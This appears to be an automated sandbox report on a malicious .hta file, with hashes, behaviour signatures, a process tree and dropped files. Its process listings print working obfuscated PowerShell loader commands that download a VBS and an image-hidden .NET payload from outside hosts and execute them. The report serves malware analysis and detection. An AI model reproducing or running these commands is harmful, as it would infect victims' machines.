Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-02-2025 05:36

General

  • Target

    mydreamgirlsheismybestgirleveriseenwithherlovergood.hta

  • Size

    15KB

  • MD5

    fae5ca5adff365408b3e3054c123c681

  • SHA1

    d6477f5d534c121bc0fff71f050e311526d9e5f3

  • SHA256

    5c9cb60a6bf32648964076e620fe9560ead5fb09ab9b8017667daa13b88ce5c6

  • SHA512

    6744d1ea402c690df3db54db55a007be8c50426ee23943ab6c518861e79838f1d1c829b2890fb4ebed8ed79bc49f4fc47647ce1d0192fb284a207471165f4d6e

  • SSDEEP

    96:dunKunqqFzsff/FbcorJFmqei+UunzunJ6unx+:8ZqUs39bsi+TavA

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mydreamgirlsheismybestgirleveriseenwithherlovergood.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2716
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWeRshell -ex byPasS -nOP -W 1 -C dEVicecRedentIALdeplOYmeNT ; iex($(IEX('[systEM.tExT.eNcoDinG]'+[chAr]58+[Char]0X3A+'UTf8.geTsTRiNG([sysTem.cOnverT]'+[chAr]0X3a+[Char]0x3a+'fROMbasE64sTRINg('+[ChaR]0X22+'JFVDREJ1cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUGpHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhFV05uLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGR4aXJmdEQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdvYkZtQUdlaVBQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiWGR0a3NqaUN2YiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE9paXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVDREJ1cDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE1LjIzNS4yMDMuMjEyLzU0MzMvbXlkcmVhbWdpcmxzaGVpc215YmVzdGdpcmxldmVyaXNlZW53aXRoaGVybG92ZXJnb29kLmdJRiIsIiRFTlY6QVBQREFUQVxteWRyZWFtZ2lybHNoZWlzbXliZXN0Z2lybGV2ZXJpc2VlbndpdGhoZXJsb3Zlcmdvby52YnMiLDAsMCk7c1RBclQtc0xFRXAoMyk7SU5WT2tFLUl0RW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG15ZHJlYW1naXJsc2hlaXNteWJlc3RnaXJsZXZlcmlzZWVud2l0aGhlcmxvdmVyZ29vLnZicyI='+[cHar]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2768
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gpcy971b.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2592
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF671.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF670.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2616
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2168
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAG8AZwByAGUAdgBvAGwAcgBlAGgAaAB0AGkAdwBuAGUAZQBzAGkAcgBlAHYAZQBsAHIAaQBnAHQAcwBlAGIAeQBtAHMAaQBlAGgAcwBsAHIAaQBnAG0AYQBlAHIAZAB5AG0ALwAzADMANAA1AC8AMgAxADIALgAzADAAMgAuADUAMwAyAC4ANQAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABnAG8AaAB1ADcAcwBsAHgALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMAOAA4ADQANQAwADAANAAvAGsAZAB4AHoAbQBlAHkAbAA0ADEAZgAxAHMAcwBtAHkAaAA0AGEAeAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2916

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab2F6C.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF671.tmp

    Filesize

    1KB

    MD5

    7c0de5efdf6d9af3308e009dc5b88d06

    SHA1

    46e247f3f6b6b519fd5774c313fb3622f7503790

    SHA256

    2b4727177161a8325fc770b809d97ab26062fdbb5c2c7a560d95091eb9451af0

    SHA512

    070150c5f520bd1396ec9833d3bc0372df3c396d0ea98e4cba711ddf76aa9d7ff94d320d0f77558172dd51bba67bd1be7408215f543f3ac61fde24f6b92361b3

  • C:\Users\Admin\AppData\Local\Temp\Tar2F7E.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\gpcy971b.dll

    Filesize

    3KB

    MD5

    21c65695f00a7378b9cd054d79267c5a

    SHA1

    23495f7aadad750edbb04c49be4620968b7a4219

    SHA256

    c2a937c796543ed1f340da90b7816567f9eb12f551d54456ab9224dd0e924096

    SHA512

    92c4a22bf8f506750697a33ddbf027772ef74500c009b1a950b11915fc5abcc3e591b41f4deaeb92ab86905e88b77f7002bd3860adf3a19e1935ea14fae73a26

  • C:\Users\Admin\AppData\Local\Temp\gpcy971b.pdb

    Filesize

    7KB

    MD5

    50db7912c37e75c67a254fbe53a10221

    SHA1

    8c25dd97843a02bdf433178c69a72d2b5f05b0c6

    SHA256

    ab67122b970a9779c2ae7e835500ce549c378c126e86faa08024d949ba63ffde

    SHA512

    c8df68be594109609d3c1bcea97351ba157f10c41a0691171daf7145ae2b7e1605d01a343cb0d388b5d3f9739a4a427bc43f9f66e79f77382a4deac256797841

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    f987900315172d90db5b80e5495675db

    SHA1

    ed3c76edfc47caf55f75846c083fad266636985e

    SHA256

    5844bfcabdef7423d8f72f6e1206dd9455bb033860c2c34837f770662d73e696

    SHA512

    be69cb22e0122bdbcb0f8831b1daa4561f69f274067f0e0b1711f557b044b7ad566e47401ef7eccf835eb3230b594e75ec61ed163dd97896f187f5598304ea79

  • C:\Users\Admin\AppData\Roaming\mydreamgirlsheismybestgirleveriseenwithherlovergoo.vbs

    Filesize

    185KB

    MD5

    88381fe4eced12ab51b61b701655dfc4

    SHA1

    363e0d60930acafa210f5f9123f4a935fe8b32f2

    SHA256

    544f1930b15b1ad1efc93e230a48aa877044acdac4d42e15dd4f3b293eb4b1ae

    SHA512

    89389de03393aab55f6d016a99c94a8e005b9b3da233d7305f7df90432ec130ac70a0d5d3ac44adb620dad7dfb897511328c1fd747a83472284e94d992d773bb

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF670.tmp

    Filesize

    652B

    MD5

    8c64031ff0c4a19f3391a1f83f714746

    SHA1

    a77ffb768bf799cf904bea90377b228346c62c05

    SHA256

    4d81a0ad0435ce0b8ee80d14fc85adacc7ddb249a7eb4991274d52cc25b415f8

    SHA512

    e0b886677fd23664e1fc2ceb308185eb7a1971f1aa531202cfca38f0705c6ed554d00f42114946e733f0c270438acbf6c3cc2354c05ae033ef60f904cda687df

  • \??\c:\Users\Admin\AppData\Local\Temp\gpcy971b.0.cs

    Filesize

    481B

    MD5

    3d85a0a117fb394a23636614a6bed698

    SHA1

    d1bd8ef2834bc9eccee2985192067441a8988974

    SHA256

    bed32737b1920c7ab8195497a0b2db0763a67a9b23561c2e5b68fe3d295edaff

    SHA512

    59a405e2fa77fecc7163e02b11c64a8f08f744392d712c6a6e08194d6dee41d8af64fbef08dc6e3f18e43cb3636aff4d8c25596d3bfeefbe80df8fb726e3f0dc

  • \??\c:\Users\Admin\AppData\Local\Temp\gpcy971b.cmdline

    Filesize

    309B

    MD5

    05b626729a00fef894c238cf12fd548c

    SHA1

    1ea506d7ab7dd4974e7e68c49b6dff8734d7b61e

    SHA256

    6e371a3bb70640b2b3ebf29caa5a4682128afacde64950f6e8f2aedf0d5485c2

    SHA512

    ff2c74add059b9210f6c507150e384a7005cc467cff96eb51153ebb44f41fc7d39a4d1a604a689c3a93200be7522cae9582e3ed62c2935dfd06bae14a9037f27